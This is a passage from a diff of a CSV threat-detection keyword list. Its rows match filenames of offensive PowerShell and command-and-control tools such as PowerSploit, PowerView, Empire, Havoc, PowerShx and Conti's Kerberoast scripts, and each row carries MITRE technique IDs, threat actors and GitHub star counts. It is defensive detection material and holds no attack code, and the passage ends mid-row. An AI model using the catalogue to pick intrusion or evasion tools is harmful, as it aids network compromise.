 "*powershell-import *.ps1*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
 "*powershell-import*Invoke-Kerberoast.ps1*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*powershell-import*ShareFinder.ps1*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
-"*PowershellKerberos-main*","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","1","N/A","9","3","262","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z"
+"*PowershellKerberos-main*","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","1","N/A","9","3","263","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z"
 "*PowerShellMafia*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*PowerShellMafia/PowerSCCM*","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","8","4","301","110","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z"
-"*PowerShellMafia/PowerSploit*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*PowerShellMafia/PowerSploit*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
 "*PowerShellObfuscator.ps1*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z"
-"*PowershellRunner.h*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z"
+"*PowershellRunner.h*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
 "*PowerShellStager*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
-"*PowerShell-Suite*","offensive_tool_keyword","PowerShell-Suite","There are great tools and resources online to accomplish most any task in PowerShell. sometimes however. there is a need to script together a util for a specific purpose or to bridge an ontological gap. This is a collection of PowerShell utilities I put together either for fun or because I had a narrow application in mind.","T1059 - T1086 - T1140 - T1145 - T1216","TA0002 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/PowerShell-Suite","1","1","N/A","N/A","10","2510","794","2021-11-19T12:18:24Z","2015-12-11T13:14:41Z"
+"*PowerShell-Suite*","offensive_tool_keyword","PowerShell-Suite","There are great tools and resources online to accomplish most any task in PowerShell. sometimes however. there is a need to script together a util for a specific purpose or to bridge an ontological gap. This is a collection of PowerShell utilities I put together either for fun or because I had a narrow application in mind.","T1059 - T1086 - T1140 - T1145 - T1216","TA0002 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/PowerShell-Suite","1","1","N/A","N/A","10","2511","794","2021-11-19T12:18:24Z","2015-12-11T13:14:41Z"
 "*PowerShx.dll*","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","267","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z"
 "*PowerShx.exe*","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","267","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z"
 "*PowerShx.sln*","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","267","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z"
 "*PowerShxDll.csproj*","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","267","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z"
 "*PowerShx-master*","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","267","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z"
-"*PowerSploit*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that 
can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*PowerSploit-*.zip*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*PowerSploit.*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*PowerSploit/releases*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*PowerSploit*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*PowerSploit-*.zip*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*PowerSploit.*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*PowerSploit/releases*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*powerstager*","offensive_tool_keyword","PowerStager","PowerStager: This script creates an executable stager that downloads a selected powershell payload.","T1105 - T1059.001 - T1204","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/z0noxz/powerstager","1","1","N/A","N/A","2","181","59","2019-12-15T09:30:05Z","2017-04-17T12:13:31Z" -"*PowerUp.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*PowerUp.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1128","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*PowerUp.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*PowerUp.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1128","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*PowerUpSQL*","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1087 - T1059 - T1003 - T1078 - T1053 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","Web Attacks","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","2182","456","2023-06-27T02:42:35Z","2016-06-22T01:22:39Z" "*PowerView.ps1*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*PowerView.ps1*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*powerview.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1078","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*PowerView.ps1*","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains. It contains a set of pure-PowerShell replacements for various windows net commands. which utilize PowerShell AD hooks and underlying Win32 API functions to perform useful Windows domain functionality It also implements various useful metafunctions. 
including some custom-written user-hunting functions which will identify where on the network specific users are logged into. It can also check which machines on the domain the current user has local administrator access on. Several functions for the enumeration and abuse of domain trusts also exist","T1087 - T1069 - T1064 - T1002 - T1552","TA0002 - TA0003 - TA0008","N/A","N/A","Information Gathering","https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon","1","0","N/A","N/A","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*powerview.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1078","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - 
APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*PowerView.ps1*","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains. It contains a set of pure-PowerShell replacements for various windows net commands. which utilize PowerShell AD hooks and underlying Win32 API functions to perform useful Windows domain functionality It also implements various useful metafunctions. including some custom-written user-hunting functions which will identify where on the network specific users are logged into. It can also check which machines on the domain the current user has local administrator access on. Several functions for the enumeration and abuse of domain trusts also exist","T1087 - T1069 - T1064 - T1002 - T1552","TA0002 - TA0003 - TA0008","N/A","N/A","Information Gathering","https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon","1","0","N/A","N/A","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*PowerView_dev.ps1*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" "*PowerView3-Aggressor*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - 
T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*ppenum.c*","offensive_tool_keyword","cobaltstrike","Simple BOF to read the protection level of a 